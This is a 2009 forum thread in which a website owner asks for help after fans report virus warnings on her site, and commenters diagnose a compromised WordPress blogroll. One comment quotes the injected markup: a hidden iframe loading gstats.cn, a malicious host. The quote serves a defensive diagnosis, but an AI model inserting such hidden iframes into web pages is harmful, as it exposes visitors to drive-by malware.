Log in

No account? Create an account
11 March 2009 @ 12:40 pm
virus removal?  

Apparently cemurphy.net is laden with viruses and trojans. I have no idea how to even find these, as I’m not getting any warnings about them, much less remove them. Is this something I should talk to my host provider about, or is there something I can do? How? Help!

eta resolved. thanks.

(x-posted from the essential kit)
Pamela: House - brain hurtsjeditigger on March 11th, 2009 12:47 pm (UTC)
Your host provider should have some virus scanning on their servers. :/ Contact them first, as there is very little you can do considering the host machines are theirs.

kitmizkit on March 11th, 2009 12:50 pm (UTC)
Thank you, that's what I needed to know.
Autopopeautopope on March 11th, 2009 01:03 pm (UTC)
Who or what is telling you about the viruses and trojans?

What software does cemurphy.net run on? (If you have access at that level.)

kitmizkit on March 11th, 2009 01:06 pm (UTC)
I've had two emails from fans in the past two days saying they were getting virus and trojan warnings. It's running on Apache 1.3.41, but I know that through the cpanel and am not the person to be screwing with anything Unix-related.
Autopopeautopope on March 11th, 2009 01:16 pm (UTC)
1.3.41 is a legacy maintenance release, dating to January 2008: the current Apache version is 2.2.11. As Apache goes through a major version number about once a decade, I'd say any hosting company still relying on 1.3.x deserves a good kicking.

Do I take it that you use Windows at home?

If not, then your best bet may be to just mirror the site, weed out the dodgy stuff (anything you didn't put there, basically), nuke everything on the server, and reupload.

If you run Windows, this is somewhat risky -- you might infect your own machine.

In either case, yelling at your hosting company is probably a good idea. And? Run every piece of AV and anti-malware software you can get your hands on on your own machine, just in case!
Pamelajeditigger on March 11th, 2009 04:21 pm (UTC)
This wonderful gentleman (no surprise) knows scads more than I, Kit. :) But my point is that some things should be defensible from a server standpoint, so be sure that at least is going on the host side.
dtm on March 11th, 2009 01:12 pm (UTC)
It's those "nice" gentlemen from gstats.cn again. (See my previous post about these wastes of carbon) They've inserted themselves in your html again:
<li><a href="http://mizkit.com">mizkit.com</a></li>
<li><a href="http://cemurphy.net/gallery/"><img src="" width="0" height="0"/>Photo Gallery</a><iframe src=http://gstats.cn style=display:none></iframe><a href=# style=display:none><img  width="0" height="0" src=""  alt="Photo Gallery"  /></a></li>

The good news is that it isn't your site directly that's infected, but it's got a pointer off to a world of badness. The bad news is, these people can apparently get in and make changes to your template.

Have you upgraded wordpress lately? If not, they'll get in again.

kitmizkit on March 11th, 2009 01:14 pm (UTC)
*sigh* Ah. Thank you. And yes, I'm running the latest WP, so that's not really a good sign.
kitmizkit on March 11th, 2009 01:14 pm (UTC)
...actually, what it's getting in to are the blogroll things.
Autopopeautopope on March 11th, 2009 01:17 pm (UTC)
Can you define words or patterns to auto-moderate, in the blogroll? Or simply ban URLs?
kitmizkit on March 11th, 2009 01:30 pm (UTC)
Although it's possible this is left over from an old installation of WordPress, and since I've only just started using it again it's only just now being flagged. Anyway, thank you very much.
wednesday childewedschilde on March 11th, 2009 01:40 pm (UTC)
that's some cold you got going on over there. even infects your website
Jeff Linderjslinder on March 11th, 2009 01:43 pm (UTC)
I ran a scan on the page and got no hits with my AV suite, and you have no ad feeds, so checking with your host is the best way to go, as it could be in one of their meta feeds.